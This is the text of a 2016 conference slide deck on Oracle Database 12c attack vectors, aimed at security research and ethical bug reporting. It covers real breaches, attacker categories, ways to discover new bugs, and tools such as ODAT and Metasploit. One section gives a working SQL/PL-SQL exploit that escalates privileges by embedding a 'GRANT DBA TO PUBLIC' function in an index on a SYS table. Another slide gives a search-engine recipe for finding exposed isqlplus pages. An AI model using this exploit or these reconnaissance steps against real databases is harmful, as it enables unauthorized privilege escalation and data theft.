Oracle database 12c
attack vectors
Martin Toshev,
BGOUG, 04.06.2016

Who am I
Software consultant (CoffeeCupConsulting)
BG JUG board member (http://jug.bg)
OpenJDK and Oracle RDBMS enthusiast

Who am I
Author of Learning RabbitMQ

Agenda
• Real world examples
• Attack vectors
• Attack discovery approach
• Tools

Real world examples

Real world examples
source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say-
larry-ellison-217341.html, 30 Jan, 2014

Real world examples
However …

Real world examples
Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/
"Disable the protocol in Version 11.1 and start
using older versions like Version 10g," which is
not vulnerable”
they didn't fix the current version, which
leaves 11.1 and 11.2 still susceptible to attacks

Real world examples
Source: http://www.joxeankoret.com/download/tnspoison.pdf/

Real world examples
Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf
Simple example:
1) https://www.google.ca/advanced_search
2) search for ‘/isqlplus’ and specify 'URL only'
3) voila

Real world examples
Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html

Real world examples
Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722
http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies

Real world examples
Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm

Real world examples
Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf

Real world examples
• Privelege escalation via indexes in 12c:
-- from SYS: create c##autoexec user
CREATE USER c##autoexec IDENTIFIED BY 123;
GRANT CREATE SESSION TO c##autoexec;
GRANT CREATE PROCEDURE TO c##autoexec;
ALTER USER C##autoexec QUOTA 100M ON USERS;
CREATE TABLE foo (
Id int
);
INSERT INTO sys.foo values (100);
INSERT INTO sys.foo values (50);
GRANT INDEX ON foo to c##autoexec;
GRANT SELECT, INSERT ON foo TO c##autoexec;

Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec: attempt to set the DBA role - FAILS
SET ROLE DBA;

Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec
CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN
VARCHAR DETERMINISTIC AUTHID
CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
COMMIT;
RETURN 'FOO';
END;

Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec
GRANT EXECUTE ON GETDBA TO public;
CREATE INDEX EXPLOIT_INDEX ON
SYS.FOO(C##AUTOEXEC.GETDBA(''));
-- from SYSDBA
SELECT * FROM sys.foo;
-- from c##autoexec: SUCCESS
SET ROLE DBA;

Attack vectors

Attack vectors
• Let’s have a look at the high level architecture of
the database …

Attack vectors
unauthorized authorized
(limited permissions)
authorized
(SYSDBA)
OS
level

Attack vectors
• Attack vectors can originate from different
sources depending on the setup (we will
abstract ourselves from this criteria):
– external (applications running publicly, vulnerable
protocols running on the database servers,
malware enabling machine access)
– internal (employees with non-dba access, DBAs,
OS-level users)

Attack vectors
• Attacks from unauthorized users:
– reconnaissance:
• looking for application servers and database tools running on the
database publicly
• using search engines to find Oracle directory indices, web apps (such
as isqlplus) running publicly
• port scanning for well known ports (such as 1521 for the TNS listener)
on target machines

Attack vectors
• Attacks from unauthorized users:
– gaining access:
• exploring misconfiguration - using default credentials
• exploring lack of identity policy – password brute forcing
• exploring security bugs (e.g. buffer overflow enabling arbitrary
command execution on the TNS listener)

Attack vectors
• Attacks from unauthorized users:
– data theft:
• exploring lack of encryption leading to man-in-the-middle attacks (e.g.
TNS listener poisoning or eavesdropping)
– DoS/DDoS attacks:
• network level DoS (e.g. excessive packets)
• buffer overflow DoS (e.g. bug in the TNS listener)

Attack vectors
• Attacks from authorized users with limited
permissions:
– SQL injection (typically caused by buggy applications
having a DB user with excessive privileges)
– DoS attacks (e.g. due to misconfiguration – excessive
connections, filling shared tablespaces, running
complex queries)

Attack vectors
• Attacks from authorized users with limited
permissions:
– privilege escalation (e.g. via the INDEX permission)
– data theft (e.g. via PL/SQL procedure injection,
scheduling opening of remote socket connections to
external sources)

Attack vectors
• SYSDBA access … the world is yours
• OS level access – many methods to retrieve
passwords and useful data from raw Oracle
database files

Attack discovery approach

Attack discovery approach
• Already uncovered security bugs as the ones we
discussed are fixed and released by Oracle as
critical patch updates
• But how to uncover new bugs and ethically report
them before being discovered by attackers ?

Attack discovery approach
• Explore new features (e.g. multitenancy)
• See what parts of the security architecture of the
database are in use by these features
• Explore changes to the security architecture and
new security features

Attack discovery approach
• For top 12c new features (at a glance):
– consolidation (pluggable databases)
– redaction policy

Attack discovery approach
• For top 12c new features (at a glance):
– consolidation (pluggable databases) – resource
utilization of PDBs, access boundary between PDBs,
secure data replication between PDBs, discrepancies in
local/common users/roles ?
– redaction policy – other built-in functions/mechanisms
that can reveal redacted data ? (we already saw some)

Attack discovery approach
• For top 12c new features (at a glance):
– In Line PL/SQL Functions in SQL queries
– Online Migration of Table Partition or Sub Partition

Attack discovery approach
• For top 12c new features (at a glance):
– In Line PL/SQL Functions in SQL queries – bypassing
security mechanism, privilege escalation ?
– Online Migration of Table Partition or Sub Partition –
data theft ?

Attack discovery approach
• For top 12c new features (at a glance):
– Full Database Caching
– SQL translation framework

Attack discovery approach
• For top 12c new features (at a glance):
– Full Database Caching – buffer overflows, DoS,
malicious in-memory data manipulation ?
– SQL translation framework – malicious third-party
translation plug-ins, security bugs in translation plug-
ins ?

Attack discovery approach
explore existing attacks and security bugs (e.g.
use packet crafting tools to try buffer overflow
attacks over enhancements of database
protocols)
explore vulnerability databases such as CVE for
exploits and try to adapt some of them to new
database features

Attack discovery approach
make use of proper penetration testing tool such
as Metasploit to adapt existing attacks for
10g/11g or older versions to 12c
analyze new PL/SQL packages for security leaks
disassemble Oracle binaries

Attack discovery approach
• You may, of course, discover issues not
introduced in 12c but rather propagating through
multiple versions (such as the TNS poison
vulnerability) …

Tools

Tools
• nmap
• Metasploit
• Tnscmd
• ODAT (Oracle Database Attacking Tool)
• w32dasm/ IDA Freeware
• Kali Linux

Tools
• ODAT supports 12.1.0.2.0:
– try to find valid SIDs and credentials
– try to escalate valid account to DBA or SYSDBA
– try to execute OS commands from a valid account

Some readings that may bring ideas …

Some readings that may bring ideas …

Thank you !
Q&A

References
Oracle 12c Security whitepaper
http://www.oracle.com/technetwork/database/security/security-compliance-
wp-12c-1896112.pdf
Oracle Database 12c architecture overview
https://www.youtube.com/watch?v=266ay9N6kAw
Oracle Database 12c New security Features
http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da
tabase_12_new_security_features_summary.pdf

References
Oracle Database 12c security
http://docs.oracle.com/database/121/nav/portal_25.htm
Oracle database security checklist
http://www.isaca.org/groups/professional-english/oracle-
database/groupdocuments/twp-security-checklist-database-1-132870.pdf
Encryption and Redaction in Oracle Database
12c with Oracle Advanced Security
http://www.oracle.com/technetwork/database/options/advanced-
security/advanced-security-wp-12c-1896139.pdf

References
Privelege escalation via Oracle indexes
http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Attacking Oracle with the Metasploit Framework
http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-
OracleMetasploit-SLIDES.pdf
Oracle Database TNS Listener Poison Attack
http://www.joxeankoret.com/download/tnspoison.pdf

References
ODAT (Oracle Database Attacking Tool) tool
https://github.com/quentinhardy/odat
Oracle Database 12c CVE vulnerabilities statistics
https://www.cvedetails.com/product/467/Oracle-Database-
Server.html?vendor_id=93
Oracle Database 12c CVE vulnerabilities
https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-
467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html